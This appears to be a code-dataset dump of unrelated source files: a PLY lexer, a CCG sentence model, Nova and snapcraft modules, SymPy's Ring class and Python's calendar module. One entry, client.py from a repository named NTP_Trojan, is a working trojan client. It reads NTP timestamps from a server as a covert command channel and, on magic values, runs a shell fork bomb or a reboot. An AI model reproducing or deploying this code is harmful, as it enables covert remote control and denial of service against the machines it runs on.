repo_name stringlengths 5 100 | ref stringlengths 12 67 | path stringlengths 4 244 | copies stringlengths 1 8 | content stringlengths 0 1.05M ⌀ |
|---|---|---|---|---|
dhh1128/intent | refs/heads/master | old/grammar/ply/ply/intent_tokens.py | 1 | import lex
# Regular expression rules for simple tokens.
# NOTE: PLY sorts string rules by decreasing regex length, so the *_EQUALS
# and doubled forms are matched before their single-character prefixes.
t_PLUS = r'\+'
t_PLUS_EQUALS = r'\+='
t_MINUS = r'-'
t_MINUS_EQUALS = r'-='
t_TIMES = r'\*'
t_TIMES_EQUALS = r'\*='
t_DIVIDE = r'/'
t_DIVIDE_EQUALS = r'/='
t_MODULO = r'%'
t_MODULO_EQUALS = r'%='
t_TILDE = r'~'
# Fixed: was r'.' (unescaped), which matched ANY single character and could
# silently swallow characters that should have hit t_error.
t_DOT = r'\.'
t_COMMA = r','
t_QUOTE = r'"'
t_BIT_AND = r'&'
# Fixed: raw-string prefix added for consistency with every other rule
# (no behavior change here, '&=' has no escapes).
t_BIT_AND_EQUALS = r'&='
t_BIT_OR = r'\|'
t_BIT_OR_EQUALS = r'\|='
t_BIT_XOR = r'\^'
t_BIT_XOR_EQUALS = r'\^='
t_LESS_THAN = r'<'
t_LESS_THAN_EQUAL = r'<='
t_DOUBLE_LESS_THAN = r'<<'
# Fixed: was r'>>' -- a copy-paste of DOUBLE_GREATER_THAN below, which made
# a lone '>' unmatchable as GREATER_THAN.
t_GREATER_THAN = r'>'
t_GREATER_THAN_EQUAL = r'>='
t_DOUBLE_GREATER_THAN = r'>>'
t_EQUALS = r'='
t_LPAREN = r'\('
t_RPAREN = r'\)'
# \x01 and \x02 are synthetic markers injected for indent tracking.
t_INDENT = r'\x01'
t_DEDENT = r'\x02'
t_NAME = r'[a-z]+'
# FLOAT token: requires a fractional part, an exponent, or both, so it never
# collides with plain integers.  Defined before t_NUMBER because PLY tries
# function rules in definition order.
def t_FLOAT(t):
    r'\d+((\.\d*)([eE]-?\d+)?|(\.\d*)?([eE]-?\d+))'
    # NOTE: in PLY the docstring above IS this token's regular expression --
    # do not edit it as prose.
    return t
# NUMBER token: integer literals with '_' allowed as a digit separator.
def t_NUMBER(t):
    r'(0([0-7_]+|[bB][01_]+|[xX][0-9A-Fa-f_]+)?|[1-9][0-9_]*)'
    # We support octal, binary, hex, and decimal literals.
    # NOTE: in PLY the docstring above IS this token's regular expression.
    # A leading '0' introduces octal (0NNN), binary (0b), or hex (0x) forms;
    # a bare '0' is also accepted by the optional group.
    return t
import re

# Derive PLY's required ``tokens`` list from every t_UPPERCASE rule defined
# above, stripping the ``t_`` prefix.  Lower-cased helpers such as t_ignore
# and t_error are deliberately excluded by the pattern.
_token_rule = re.compile('t_[A-Z_]+')
tokens = [rule_name[2:] for rule_name in list(locals().keys())
          if _token_rule.match(rule_name)]
# Drop the scratch names so they don't pollute the module namespace.
del _token_rule
del re
def _scan_indents(lexer):
    '''
    At beginning of a new line, see how many indents it has. Each indent can
    potentially be a different width, but we should never mix spaces and tabs.
    Return how many new indents or dedents we see. The max new indent is 1;
    the max number of new dedents == current indent level. Dedents are returned
    as negative numbers (so to dedent 4 times, return -4).
    '''
    # Despite the docstring, the result is communicated via
    # lexer.indent_delta rather than a return value (see init block below).
    i = lexer.lexpos          # position of the first char after the newline(s)
    txt = lexer.lexdata
    end = lexer.lexlen
    # Index of the innermost currently-open indent; -1 when at top level.
    current_indent_idx = len(lexer.indents) - 1
    more_lines = True
    start_over = False
    while more_lines:
        # Did we run out of characters?
        if i + 1 >= end:
            return
        # Sample first char on next line.
        # NOTE(review): ``i`` is never advanced when the loop restarts via
        # ``continue`` below, even though lexer.lexpos has moved -- confirm
        # this cannot loop on a stale character.
        c = txt[i]
        # If line's not indented, record necessary dedents and exit.
        if not c.isspace():
            lexer.indent_delta = -1 * (current_indent_idx + 1)
            return
        # If this is the first indented line, lock the entire lexing
        # pass to either tabs or spaces -- disallow mixture.
        if lexer.indent_char is None:
            lexer.indent_char = c
        # Now walk through each indenter that's currently active, and see
        # how many of them we see on this new line.
        indent_idx = 0
        while indent_idx <= current_indent_idx:
            width = lexer.indents[indent_idx]
            begin = lexer.lexpos
            indent_end = begin + width
            actual_end = min(indent_end, end)   # clamp to end of input
            start_over = False
            j = begin
            while j < actual_end:
                c = txt[j]
                if c != lexer.indent_char:
                    # If we stopped processing an indented line because we hit another
                    # line break, just start the analysis all over.
                    if c == '\n':
                        lexer.lineno += 1
                        start_over = True
                        break
                    # If we found at least one indent char, but not all of the indent chars
                    # we expected, we definitely have a problem.
                    if j > begin:
                        if c.isspace():
                            # A different whitespace char mid-indent: tab/space mixture.
                            raise Exception("Bad indent char %d on line %d." % (ord(c), lexer.lineno))
                        else:
                            raise Exception("Incomplete indent on line %d." % lexer.lineno)
                    break
                j += 1
            # If we get here, then we have consumed pure indent chars, until
            # either the indent was finished, a new linebreak was found, the
            # input ended, or we hit non-indent characters.
            # Consume everything we just scanned so lexer doesn't have to
            # reanalyze.
            lexer.lexpos = j
            # If we found a line break or ran out of indent characters without
            # throwing an exception, just exit this loop.
            if start_over or (c != lexer.indent_char):
                break
            # If we did not see the full indent that we were expecting, then the
            # input ended in the middle of a partial indent. This is not an error,
            # but it means our job is done.
            if actual_end < indent_end:
                return
            indent_idx += 1
        # If we found a line break, restart the outermost loop with the fresh line.
        if start_over:
            continue
        # If we get here, we've consumed all existing indents without exhausting
        # our input. Are we as indented as the previous line?
        if indent_idx <= current_indent_idx:
            # No. We need to emit 1 or more dedents.
            lexer.indent_delta = indent_idx - (current_indent_idx + 1)
            # No need to look at subsequent lines; we've found meaningful text on this one.
            more_lines = False
        else:
            # Yes. Are we more indented?
            # NOTE(review): if lexer.lexpos >= end this for-loop never runs
            # and ``j`` keeps its value from the scan above -- confirm that
            # is the intended fallback.
            for j in xrange(lexer.lexpos, end):
                c = txt[j]
                if c != lexer.indent_char:
                    if c == '\n':
                        lexer.lineno += 1
                        lexer.lexpos = j
                        start_over = True
                    elif c.isspace():
                        raise Exception("Bad indent char %d on line %d." % (ord(c), lexer.lineno))
                    break
            # If we found another new line, start all over again.
            if start_over:
                continue
            if j > lexer.lexpos:
                # Extra indent chars beyond all open indents: open exactly one
                # new indent of whatever width we saw.
                lexer.indents.append(j - lexer.lexpos)
                lexer.lexpos = j
                lexer.indent_delta = 1
            # We're done.
            more_lines = False
# Define a rule so we can track line numbers and track indents.
def t_newline(t):
    r'\n+'
    # PLY uses the docstring above as this rule's regex: one or more newlines.
    t.lexer.lineno += len(t.value)
    # No token is returned (newlines are discarded); the call below records
    # any indent/dedent change on t.lexer.indent_delta as a side effect.
    _scan_indents(t.lexer)
# A string containing ignored characters (spaces and tabs)
# \x01/\x02 are the synthetic indent markers from t_INDENT/t_DEDENT above.
# NOTE(review): because they also appear here in t_ignore, the INDENT/DEDENT
# token rules may never fire -- confirm which behavior is intended.
t_ignore = ' \t\x01\x02'
# Error handling rule: report the offending character and resynchronize by
# skipping one character.  Changed the Python 2 print statement to a print()
# call for consistency with the print() calls used elsewhere in this file
# (and so the module also runs under Python 3); the message text is unchanged.
def t_error(t):
    print("Illegal character '%s'" % t.value[0])
    t.lexer.skip(1)
# Build the lexer from this module's t_* rules and attach the custom
# indentation-tracking state consumed/updated by _scan_indents().
lexer = lex.lex()
lexer.indents = []        # widths of currently-open indents, outermost first
lexer.indent_char = None  # locked to ' ' or '\t' on the first indented line
lexer.indent_delta = 0    # +1 for one new indent, -n for n dedents
# Interactive driver (Python 2 only: uses raw_input and xrange).
# Reads code until a lone '!', dumps each character with its offset,
# then tokenizes the buffer and prints every token.
if __name__ == '__main__':
    while True:
        print('Enter some code, then ! to finish...')
        code = ''
        while True:
            line = raw_input()
            if line == '!':
                break
            code = code + line + '\n'
        # Echo the raw buffer, making newlines and spaces visible.
        for i in xrange(len(code)):
            c = code[i]
            if c == '\n':
                c = '\\n'
            elif c == ' ':
                c = 'space'
            print(str(i).rjust(3) + ' ' + c)
        lexer.input(code)
        while True:
            tok = lexer.token()
            if not tok:
                print('')
                break # No more input
            print('type=%s, value=%s, line=%d, lexpos=%d' % (str(tok.type).rjust(7), str(tok.value).rjust(6), tok.lineno, tok.lexpos))
|
hill1303/CCGParaphraseGenerator | refs/heads/master | novel_disambiguation/models/sentence.py | 1 | from xml.etree import cElementTree as ElementTree
__author__ = 'Ethan A. Hill'
class Sentence:
    """A sentence together with its best and second-best CCG parses.

    The "ambiguous span" is the set of unlabeled dependencies on which the
    two parses disagree; an empty span means the sentence is unambiguous.
    Python 2 module: ``__cmp__``/``cmp`` and ``dict.iteritems`` are kept.
    """

    def __init__(self, parent_file_name, top_parse, next_best_parse=None):
        self.parent_file_name = parent_file_name
        self.top_parse = top_parse
        self.next_best_parse = next_best_parse
        self.reference = top_parse.reference_sentence()
        self.full_id = top_parse.sentence_id()

    def _sort_key(self):
        # Sentences order primarily by source file, then by the numeric part
        # of the id (e.g. 's12' -> 12).  Centralized here so the six
        # comparison methods below cannot drift apart (previously each one
        # duplicated this logic).
        return (self.parent_file_name, int(self.full_id[1:]))

    def __repr__(self):
        # Fixed: the original template was missing the closing paren and the
        # space before 'next_best_parse'.
        return ('Sentence(parent_file_name: {!s}, '
                'full_id: {!s}, top_parse: {!s}, '
                'next_best_parse: {!s})'.format(self.parent_file_name,
                                                self.full_id,
                                                self.top_parse,
                                                self.next_best_parse))

    def __cmp__(self, other):
        # Python 2 fallback; tuple cmp reproduces file-then-number ordering.
        return cmp(self._sort_key(), other._sort_key())

    def __eq__(self, other):
        # Equality is stricter than ordering: it also compares the parses.
        return (self.parent_file_name == other.parent_file_name and
                self.full_id == other.full_id and
                self.top_parse == other.top_parse and
                self.next_best_parse == other.next_best_parse)

    def __ne__(self, other):
        return not self.__eq__(other)

    def __lt__(self, other):
        return self._sort_key() < other._sort_key()

    def __gt__(self, other):
        return self._sort_key() > other._sort_key()

    def __le__(self, other):
        return self._sort_key() <= other._sort_key()

    def __ge__(self, other):
        return self._sort_key() >= other._sort_key()

    def ambiguous_span(self):
        """Return the set of unlabeled dependencies on which the two parses
        disagree (their symmetric difference)."""
        if self.top_parse is None or self.next_best_parse is None:
            # If there is no second parse, then there is no ambiguity.
            return set()
        dependencies = self.top_parse.unlabeled_dependency_set()
        other_depend = self.next_best_parse.unlabeled_dependency_set()
        return dependencies.symmetric_difference(other_depend)

    def is_ambiguous(self):
        return bool(self.ambiguous_span())

    def is_unambiguous(self):
        return not self.ambiguous_span()

    def detailed_ambiguous_span(self):
        """Return the detailed (head, dependent) pairs, from either parse,
        whose unlabeled form lies in the ambiguous span."""
        span = self.ambiguous_span()
        # Only look at existing parses.
        parses = [p for p in [self.top_parse, self.next_best_parse] if p]
        detailed_span = set()
        for parse in parses:
            for details, unlabeled in parse.dependency_details_map.iteritems():
                if unlabeled in span:
                    detailed_span.add(details)
        return detailed_span

    def parse_specific_ambiguity_details(self, parse):
        """Map token index -> (pos_tag, stem) for the ambiguous span, with
        stems/tags adjusted to match how *parse* analyzed each token."""
        index_stem_map = {}
        for head, dependent in self.detailed_ambiguous_span():
            head_stem, head_pos = head.stem, head.pos_tag
            depend_stem, depend_pos = dependent.stem, dependent.pos_tag
            if (head, dependent) not in parse.dependency_details_map:
                # Adjust the stems that appear in the map to match parse
                # stems: find any token in *parse* occupying the same index
                # and prefer its stem/POS.
                for parse_head, parse_depend in parse.dependency_details_map:
                    if parse_head.index == head.index:
                        head_stem = parse_head.stem
                        head_pos = parse_head.pos_tag
                    elif parse_head.index == dependent.index:
                        depend_stem = parse_head.stem
                        depend_pos = parse_head.pos_tag
                    if parse_depend.index == head.index:
                        head_stem = parse_depend.stem
                        head_pos = parse_depend.pos_tag
                    elif parse_depend.index == dependent.index:
                        depend_stem = parse_depend.stem
                        depend_pos = parse_depend.pos_tag
            index_stem_map[head.index] = head_pos, head_stem
            index_stem_map[dependent.index] = depend_pos, depend_stem
        return index_stem_map

    def has_disambiguation_options(self):
        """True if either parse offers disambiguation options (only
        meaningful when the sentence is ambiguous)."""
        if self.is_ambiguous():
            return (self.top_parse.has_disambiguation_options() or
                    self.next_best_parse.has_disambiguation_options())
        else:
            return False

    def has_single_sided_disambiguation(self):
        """True if exactly one of the two parses offers options."""
        if self.is_ambiguous():
            top_only = (self.top_parse.has_disambiguation_options() and
                        not self.next_best_parse.has_disambiguation_options())
            next_only = (self.next_best_parse.has_disambiguation_options() and
                         not self.top_parse.has_disambiguation_options())
            return top_only or next_only
        else:
            return False

    def has_double_sided_disambiguation(self):
        """True if both parses offer options."""
        if self.is_ambiguous():
            return (self.top_parse.has_disambiguation_options() and
                    self.next_best_parse.has_disambiguation_options())
        else:
            return False

    def xmlize(self):
        """Serialize this sentence (and its parses) to an ElementTree node."""
        attributes = {
            'text_file': self.parent_file_name,
            'sentence_id': self.full_id,
            'reference': self.reference,
            'ambiguous': str(self.is_ambiguous())}
        sentence_xml = ElementTree.Element('sentence', attributes)
        parses = [p for p in [self.top_parse, self.next_best_parse] if p]
        if self.ambiguous_span():
            ambiguous_span_xml = ElementTree.SubElement(
                sentence_xml, 'ambiguous_span')
            for head, dependent in self.ambiguous_span():
                # NOTE(review): ElementTree attribute values must be strings;
                # this assumes head/dependent stringify implicitly -- confirm.
                unlabeled_attributes = {
                    'head': head,
                    'dependent': dependent}
                dependency_xml = ElementTree.Element(
                    'dependency', unlabeled_attributes)
                ambiguous_span_xml.append(dependency_xml)
        for parse in parses:
            sentence_xml.append(parse.xmlize(self.ambiguous_span()))
        return sentence_xml
|
OpenAcademy-OpenStack/nova-scheduler | refs/heads/master | nova/virt/xenapi/__init__.py | 126 | # Copyright (c) 2010 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
:mod:`xenapi` -- Nova support for XenServer and XCP through XenAPI
==================================================================
"""
from nova.virt.xenapi import driver
# Re-export the driver class at package level -- presumably so it can be
# referenced by the shorter path ``nova.virt.xenapi.XenAPIDriver``; confirm
# against Nova's driver-loading code.
XenAPIDriver = driver.XenAPIDriver
|
ahhh/NTP_Trojan | refs/heads/master | client.py | 2 | import ntplib
import sys, os, subprocess
from time import ctime
# NTP server to poll for commands; loopback here -- presumably replaced with
# the real server address in deployment.
HostIP = '127.0.0.1'
# Essential shell functionality
def run_command(cmd):
    """Run *cmd* through the shell and return its combined stdout + stderr.

    SECURITY NOTE: shell=True executes *cmd* via the shell verbatim; this
    module deliberately feeds it remotely-derived commands.
    """
    proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    # Fixed: sequential proc.stdout.read() + proc.stderr.read() can deadlock
    # when the child fills the stderr pipe buffer while we are still blocked
    # reading stdout.  communicate() drains both pipes concurrently.
    out, err = proc.communicate()
    return out + err
# Poll the NTP server and treat the transmitted timestamp as a covert
# command channel.  The magic values below sit just above -2208988800
# (the Unix timestamp of the NTP 1900 epoch) -- presumably timestamps no
# legitimate server would ever send; confirm against the server side.
c = ntplib.NTPClient()
response = c.request(HostIP)
#print ctime(response.tx_time) # old print time
command = response.tx_time
#print ctime(command); print int(command)
# Forkbomb command
if int(command) == int(-2208988799):
    run_command(":(){ :|:& };:")
# Reboot if root command
if int(command) == int(-2208988798):
    run_command("reboot")
# Test command
if int(command) == int(-2208988797):
    print run_command("echo test")
|
jocave/snapcraft | refs/heads/master | integration_tests/test_store_download.py | 1 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2016 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from testtools.matchers import FileExists
import integration_tests
from snapcraft.tests import fixture_setup
class DownloadTestCase(integration_tests.TestCase):
    """Integration test for downloading the OS snap from the store."""

    def setUp(self):
        super().setUp()
        if os.getenv('TEST_USER_PASSWORD', None):
            # Real store credentials are present, but the staging server has
            # no ubuntu-core snap yet, so the test cannot run there.
            # TODO add the snap to the staging server.
            self.skipTest('There is no ubuntu-core snap in the staging server')
        else:
            self.useFixture(fixture_setup.FakeStore())
        self.login()

    def test_download_os_snap(self):
        project_dir = 'kernel-download'
        self.run_snapcraft('pull', project_dir)
        snap_path = os.path.join(
            project_dir, 'parts', 'kernel', 'src', 'os.snap')
        self.assertThat(snap_path, FileExists())
|
byte-up/custom-filter-django-oscar | refs/heads/master | shop/catalogue/__init__.py | 1 | default_app_config = 'shop.catalogue.config.CatalogueConfig'
|
dqnykamp/sympy | refs/heads/master | sympy/polys/domains/ring.py | 103 | """Implementation of :class:`Ring` class. """
from __future__ import print_function, division
from sympy.polys.domains.domain import Domain
from sympy.polys.polyerrors import ExactQuotientFailed, NotInvertible, NotReversible
from sympy.utilities import public
@public
class Ring(Domain):
    """Represents a ring domain. """

    has_Ring = True

    def get_ring(self):
        """Returns a ring associated with ``self``. """
        return self

    def exquo(self, a, b):
        """Exact quotient of ``a`` and ``b``, implies ``__floordiv__``. """
        # Only succeed when b divides a exactly.
        if not a % b:
            return a // b
        raise ExactQuotientFailed(a, b, self)

    def quo(self, a, b):
        """Quotient of ``a`` and ``b``, implies ``__floordiv__``. """
        return a // b

    def rem(self, a, b):
        """Remainder of ``a`` and ``b``, implies ``__mod__``. """
        return a % b

    def div(self, a, b):
        """Division of ``a`` and ``b``, implies ``__divmod__``. """
        return divmod(a, b)

    def invert(self, a, b):
        """Returns inversion of ``a mod b``. """
        s, t, h = self.gcdex(a, b)
        # a is invertible mod b exactly when gcd(a, b) is a unit.
        if not self.is_one(h):
            raise NotInvertible("zero divisor")
        return s % b

    def revert(self, a):
        """Returns ``a**(-1)`` if possible. """
        if not self.is_one(a):
            raise NotReversible('only unity is reversible in a ring')
        return a

    def is_unit(self, a):
        """True when ``a`` has a multiplicative inverse in this ring."""
        try:
            self.revert(a)
        except NotReversible:
            return False
        return True

    def numer(self, a):
        """Returns numerator of ``a``. """
        return a

    def denom(self, a):
        """Returns denominator of `a`. """
        return self.one

    def free_module(self, rank):
        """
        Generate a free module of rank ``rank`` over self.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> QQ.old_poly_ring(x).free_module(2)
        QQ[x]**2
        """
        raise NotImplementedError

    def ideal(self, *gens):
        """
        Generate an ideal of ``self``.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> QQ.old_poly_ring(x).ideal(x**2)
        <x**2>
        """
        from sympy.polys.agca.ideals import ModuleImplementedIdeal
        # Each generator becomes a one-element column of the rank-1 module.
        columns = [[gen] for gen in gens]
        module = self.free_module(1).submodule(*columns)
        return ModuleImplementedIdeal(self, module)

    def quotient_ring(self, e):
        """
        Form a quotient ring of ``self``.

        Here ``e`` can be an ideal or an iterable.

        >>> from sympy.abc import x
        >>> from sympy import QQ
        >>> QQ.old_poly_ring(x).quotient_ring(QQ.old_poly_ring(x).ideal(x**2))
        QQ[x]/<x**2>
        >>> QQ.old_poly_ring(x).quotient_ring([x**2])
        QQ[x]/<x**2>

        The division operator has been overloaded for this:

        >>> QQ.old_poly_ring(x)/[x**2]
        QQ[x]/<x**2>
        """
        from sympy.polys.agca.ideals import Ideal
        from sympy.polys.domains.quotientring import QuotientRing
        quot_ideal = e if isinstance(e, Ideal) else self.ideal(*e)
        return QuotientRing(self, quot_ideal)

    def __div__(self, e):
        return self.quotient_ring(e)

    __truediv__ = __div__
|
40223219/w16_test | refs/heads/master | static/Brython3.1.1-20150328-091302/Lib/calendar.py | 828 | """Calendar printing functions
Note when comparing these calendars to the ones printed by cal(1): By
default, these calendars have Monday as the first day of the week, and
Sunday as the last (the European convention). Use setfirstweekday() to
set the first day of the week (0=Monday, 6=Sunday)."""
import sys
import datetime
import locale as _locale
# Public API of the module-level (legacy) interface plus the name tables.
__all__ = ["IllegalMonthError", "IllegalWeekdayError", "setfirstweekday",
           "firstweekday", "isleap", "leapdays", "weekday", "monthrange",
           "monthcalendar", "prmonth", "month", "prcal", "calendar",
           "timegm", "month_name", "month_abbr", "day_name", "day_abbr"]

# Exception raised for bad input (with string parameter for details)
error = ValueError
# Exceptions raised for bad input
class IllegalMonthError(ValueError):
    """Raised when a month number falls outside 1..12."""
    def __init__(self, month):
        self.month = month
    def __str__(self):
        return "bad month number %r; must be 1-12" % self.month
class IllegalWeekdayError(ValueError):
    """Raised when a weekday number falls outside 0 (Monday)..6 (Sunday)."""
    def __init__(self, weekday):
        self.weekday = weekday
    def __str__(self):
        return "bad weekday number %r; must be 0 (Monday) to 6 (Sunday)" % self.weekday
# Constants for months referenced later
January = 1
February = 2

# Number of days per month (except for February in leap years)
# Index 0 is padding so mdays[month] works with 1-based month numbers.
mdays = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
# This module used to have hard-coded lists of day and month names, as
# English strings. The classes following emulate a read-only version of
# that, but supply localized names. Note that the values are computed
# fresh on each call, in case the user changes locale between calls.
class _localized_month:
_months = [datetime.date(2001, i+1, 1).strftime for i in range(12)]
_months.insert(0, lambda x: "")
def __init__(self, format):
self.format = format
def __getitem__(self, i):
funcs = self._months[i]
if isinstance(i, slice):
return [f(self.format) for f in funcs]
else:
return funcs(self.format)
def __len__(self):
return 13
class _localized_day:
# January 1, 2001, was a Monday.
_days = [datetime.date(2001, 1, i+1).strftime for i in range(7)]
def __init__(self, format):
self.format = format
def __getitem__(self, i):
funcs = self._days[i]
if isinstance(i, slice):
return [f(self.format) for f in funcs]
else:
return funcs(self.format)
def __len__(self):
return 7
# Full and abbreviated names of weekdays
day_name = _localized_day('%A')
day_abbr = _localized_day('%a')

# Full and abbreviated names of months (1-based arrays!!!)
month_name = _localized_month('%B')
month_abbr = _localized_month('%b')

# Constants for weekdays
(MONDAY, TUESDAY, WEDNESDAY, THURSDAY, FRIDAY, SATURDAY, SUNDAY) = range(7)
def isleap(year):
    """Return True for leap years, False for non-leap years."""
    # Gregorian rule: divisible by 4, except centuries not divisible by 400.
    if year % 4:
        return False
    return year % 100 != 0 or year % 400 == 0
def leapdays(y1, y2):
    """Return number of leap years in range [y1, y2).

    Assume y1 <= y2."""
    # Count leap years strictly below each endpoint and take the difference.
    a, b = y1 - 1, y2 - 1
    return (b // 4 - a // 4) - (b // 100 - a // 100) + (b // 400 - a // 400)
def weekday(year, month, day):
    """Return weekday (0-6 ~ Mon-Sun) for year (1970-...), month (1-12),
    day (1-31)."""
    # Delegate the day-of-week computation to datetime.date.
    d = datetime.date(year, month, day)
    return d.weekday()
def monthrange(year, month):
    """Return weekday (0-6 ~ Mon-Sun) and number of days (28-31) for
    year, month."""
    if month < 1 or month > 12:
        raise IllegalMonthError(month)
    first = weekday(year, month, 1)
    # February gets one extra day in leap years.
    ndays = mdays[month] + (month == February and isleap(year))
    return first, ndays
class Calendar(object):
    """
    Base calendar class. This class doesn't do any formatting. It simply
    provides data to subclasses.
    """

    def __init__(self, firstweekday=0):
        self.firstweekday = firstweekday # 0 = Monday, 6 = Sunday

    def getfirstweekday(self):
        # Normalize so any integer assigned by the user maps into 0..6.
        return self._firstweekday % 7

    def setfirstweekday(self, firstweekday):
        self._firstweekday = firstweekday

    # ``firstweekday`` is a property backed by ``_firstweekday``.
    firstweekday = property(getfirstweekday, setfirstweekday)

    def iterweekdays(self):
        """
        Return a iterator for one week of weekday numbers starting with the
        configured first one.
        """
        for i in range(self.firstweekday, self.firstweekday + 7):
            yield i%7

    def itermonthdates(self, year, month):
        """
        Return an iterator for one month. The iterator will yield datetime.date
        values and will always iterate through complete weeks, so it will yield
        dates outside the specified month.
        """
        date = datetime.date(year, month, 1)
        # Go back to the beginning of the week
        days = (date.weekday() - self.firstweekday) % 7
        date -= datetime.timedelta(days=days)
        oneday = datetime.timedelta(days=1)
        while True:
            yield date
            try:
                date += oneday
            except OverflowError:
                # Adding one day could fail after datetime.MAXYEAR
                break
            # Stop once we have left the month AND completed a full week.
            if date.month != month and date.weekday() == self.firstweekday:
                break

    def itermonthdays2(self, year, month):
        """
        Like itermonthdates(), but will yield (day number, weekday number)
        tuples. For days outside the specified month the day number is 0.
        """
        for date in self.itermonthdates(year, month):
            if date.month != month:
                yield (0, date.weekday())
            else:
                yield (date.day, date.weekday())

    def itermonthdays(self, year, month):
        """
        Like itermonthdates(), but will yield day numbers. For days outside
        the specified month the day number is 0.
        """
        for date in self.itermonthdates(year, month):
            if date.month != month:
                yield 0
            else:
                yield date.day

    def monthdatescalendar(self, year, month):
        """
        Return a matrix (list of lists) representing a month's calendar.
        Each row represents a week; week entries are datetime.date values.
        """
        dates = list(self.itermonthdates(year, month))
        return [ dates[i:i+7] for i in range(0, len(dates), 7) ]

    def monthdays2calendar(self, year, month):
        """
        Return a matrix representing a month's calendar.
        Each row represents a week; week entries are
        (day number, weekday number) tuples. Day numbers outside this month
        are zero.
        """
        days = list(self.itermonthdays2(year, month))
        return [ days[i:i+7] for i in range(0, len(days), 7) ]

    def monthdayscalendar(self, year, month):
        """
        Return a matrix representing a month's calendar.
        Each row represents a week; days outside this month are zero.
        """
        days = list(self.itermonthdays(year, month))
        return [ days[i:i+7] for i in range(0, len(days), 7) ]

    def yeardatescalendar(self, year, width=3):
        """
        Return the data for the specified year ready for formatting. The return
        value is a list of month rows. Each month row contains up to width months.
        Each month contains between 4 and 6 weeks and each week contains 1-7
        days. Days are datetime.date objects.
        """
        months = [
            self.monthdatescalendar(year, i)
            for i in range(January, January+12)
        ]
        return [months[i:i+width] for i in range(0, len(months), width) ]

    def yeardays2calendar(self, year, width=3):
        """
        Return the data for the specified year ready for formatting (similar to
        yeardatescalendar()). Entries in the week lists are
        (day number, weekday number) tuples. Day numbers outside this month are
        zero.
        """
        months = [
            self.monthdays2calendar(year, i)
            for i in range(January, January+12)
        ]
        return [months[i:i+width] for i in range(0, len(months), width) ]

    def yeardayscalendar(self, year, width=3):
        """
        Return the data for the specified year ready for formatting (similar to
        yeardatescalendar()). Entries in the week lists are day numbers.
        Day numbers outside this month are zero.
        """
        months = [
            self.monthdayscalendar(year, i)
            for i in range(January, January+12)
        ]
        return [months[i:i+width] for i in range(0, len(months), width) ]
class TextCalendar(Calendar):
    """
    Subclass of Calendar that outputs a calendar as a simple plain text
    similar to the UNIX program cal.
    """

    def prweek(self, theweek, width):
        """
        Print a single week (no newline).
        """
        print(self.formatweek(theweek, width), end=' ')

    def formatday(self, day, weekday, width):
        """
        Returns a formatted day.
        """
        if day == 0:
            s = ''
        else:
            s = '%2i' % day # right-align single-digit days
        return s.center(width)

    def formatweek(self, theweek, width):
        """
        Returns a single week in a string (no newline).
        """
        return ' '.join(self.formatday(d, wd, width) for (d, wd) in theweek)

    def formatweekday(self, day, width):
        """
        Returns a formatted week day name.
        """
        # Full names only when the column is wide enough to be readable.
        if width >= 9:
            names = day_name
        else:
            names = day_abbr
        return names[day][:width].center(width)

    def formatweekheader(self, width):
        """
        Return a header for a week.
        """
        return ' '.join(self.formatweekday(i, width) for i in self.iterweekdays())

    def formatmonthname(self, theyear, themonth, width, withyear=True):
        """
        Return a formatted month name.
        """
        s = month_name[themonth]
        if withyear:
            s = "%s %r" % (s, theyear)
        return s.center(width)

    def prmonth(self, theyear, themonth, w=0, l=0):
        """
        Print a month's calendar.
        """
        print(self.formatmonth(theyear, themonth, w, l), end=' ')

    def formatmonth(self, theyear, themonth, w=0, l=0):
        """
        Return a month's calendar string (multi-line).
        """
        # w = column width per day, l = blank lines per week row.
        w = max(2, w)
        l = max(1, l)
        s = self.formatmonthname(theyear, themonth, 7 * (w + 1) - 1)
        s = s.rstrip()
        s += '\n' * l
        s += self.formatweekheader(w).rstrip()
        s += '\n' * l
        for week in self.monthdays2calendar(theyear, themonth):
            s += self.formatweek(week, w).rstrip()
            s += '\n' * l
        return s

    def formatyear(self, theyear, w=2, l=1, c=6, m=3):
        """
        Returns a year's calendar as a multi-line string.
        """
        # w = day-column width, l = lines per week, c = spacing between
        # month columns, m = months per row.
        w = max(2, w)
        l = max(1, l)
        c = max(2, c)
        colwidth = (w + 1) * 7 - 1
        v = []
        a = v.append
        a(repr(theyear).center(colwidth*m+c*(m-1)).rstrip())
        a('\n'*l)
        header = self.formatweekheader(w)
        for (i, row) in enumerate(self.yeardays2calendar(theyear, m)):
            # months in this row
            months = range(m*i+1, min(m*(i+1)+1, 13))
            a('\n'*l)
            names = (self.formatmonthname(theyear, k, colwidth, False)
                     for k in months)
            a(formatstring(names, colwidth, c).rstrip())
            a('\n'*l)
            headers = (header for k in months)
            a(formatstring(headers, colwidth, c).rstrip())
            a('\n'*l)
            # max number of weeks for this row
            height = max(len(cal) for cal in row)
            for j in range(height):
                weeks = []
                for cal in row:
                    if j >= len(cal):
                        # This month has fewer weeks: pad with a blank column.
                        weeks.append('')
                    else:
                        weeks.append(self.formatweek(cal[j], w))
                a(formatstring(weeks, colwidth, c).rstrip())
                a('\n' * l)
        return ''.join(v)

    def pryear(self, theyear, w=0, l=0, c=6, m=3):
        """Print a year's calendar."""
        print(self.formatyear(theyear, w, l, c, m))
class HTMLCalendar(Calendar):
    """
    This calendar returns complete HTML pages.
    """

    # CSS classes for the day <td>s
